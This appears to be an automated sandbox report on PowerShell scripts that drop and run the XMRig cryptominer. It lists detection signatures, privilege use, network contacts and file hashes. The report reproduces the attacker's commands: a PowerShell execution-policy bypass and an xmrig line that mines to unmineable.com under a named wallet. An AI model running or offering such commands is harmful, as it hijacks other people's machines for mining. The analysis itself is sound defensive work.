memory/3904-84-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-85-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-86-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-87-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-88-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-89-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-90-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-91-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-92-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-93-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-94-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-95-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-96-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-97-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-98-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-99-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-100-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-101-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-102-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-103-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-104-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-105-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-106-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-107-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-108-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-109-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-110-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-111-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-112-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-113-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-114-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-115-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

memory/3904-116-0x00007FF7B2E00000-0x00007FF7B3A33000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:48

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1748s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 91.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/4568-4-0x00007FFA72F73000-0x00007FFA72F74000-memory.dmp

memory/4568-5-0x0000018C419C0000-0x0000018C419E2000-memory.dmp

memory/4568-7-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp

memory/4568-10-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp

memory/4568-9-0x0000018C41B70000-0x0000018C41BE6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_plo22vtq.fa5.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4568-25-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp

memory/4568-48-0x0000018C41B50000-0x0000018C41B62000-memory.dmp

memory/4568-61-0x0000018C41B30000-0x0000018C41B3A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4160-90-0x000002D6C4030000-0x000002D6C4050000-memory.dmp

memory/4160-91-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4568-92-0x00007FFA72F73000-0x00007FFA72F74000-memory.dmp

memory/4568-93-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp

memory/4160-94-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4568-95-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp

memory/4160-96-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-97-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-98-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-99-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-100-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-101-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-102-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-103-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-104-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-105-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-106-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-107-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-108-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-109-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-110-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-111-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-112-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-113-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-114-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-115-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-116-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-117-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-118-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-119-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-120-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-121-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-122-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-123-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-124-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-125-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-126-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-127-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-128-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-129-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-130-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-131-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-132-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-133-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-134-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-135-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-136-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-137-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-138-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-139-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-140-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-141-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-142-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-143-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-144-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-145-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-146-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-147-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-148-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-149-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-150-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-151-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-152-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-153-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-154-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-155-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

memory/4160-156-0x00007FF75FDE0000-0x00007FF760A13000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:53

Platform

win11-20240508-en

Max time kernel

1799s

Max time network

1794s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
NL 23.62.61.155:443 www.bing.com tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/2836-0-0x00007FFD97EF3000-0x00007FFD97EF5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dh2blbzd.dw1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2836-6-0x0000022F5A530000-0x0000022F5A552000-memory.dmp

memory/2836-10-0x00007FFD97EF0000-0x00007FFD989B2000-memory.dmp

memory/2836-11-0x00007FFD97EF0000-0x00007FFD989B2000-memory.dmp

memory/2836-12-0x00007FFD97EF0000-0x00007FFD989B2000-memory.dmp

memory/2836-14-0x0000022F5A720000-0x0000022F5A732000-memory.dmp

memory/2836-15-0x0000022F5A710000-0x0000022F5A71A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/448-46-0x00000182C3EF0000-0x00000182C3F10000-memory.dmp

memory/448-47-0x00000183564C0000-0x00000183564E0000-memory.dmp

memory/448-48-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/2836-50-0x00007FFD97EF0000-0x00007FFD989B2000-memory.dmp

memory/448-49-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/2836-51-0x00007FFD97EF3000-0x00007FFD97EF5000-memory.dmp

memory/448-53-0x0000018356900000-0x0000018356920000-memory.dmp

memory/2836-52-0x00007FFD97EF0000-0x00007FFD989B2000-memory.dmp

memory/448-54-0x0000018356B30000-0x0000018356B50000-memory.dmp

memory/448-55-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-56-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-57-0x0000018356900000-0x0000018356920000-memory.dmp

memory/448-58-0x0000018356B30000-0x0000018356B50000-memory.dmp

memory/448-59-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-60-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-61-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-62-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-63-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-64-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-65-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-66-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-67-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-68-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-69-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-70-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-71-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-72-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-73-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-74-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-75-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-76-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-77-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-78-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-79-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-80-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-81-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-82-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-83-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-84-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-85-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-86-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-87-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-88-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-89-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-90-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-91-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-92-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-93-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-94-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-95-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-96-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-97-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-98-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-99-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-100-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-101-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-102-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-103-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-104-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-105-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-106-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-107-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-108-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-109-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-110-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-111-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-112-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-113-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-114-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-115-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-116-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

memory/448-117-0x00007FF67BA00000-0x00007FF67C633000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:56

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1772s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
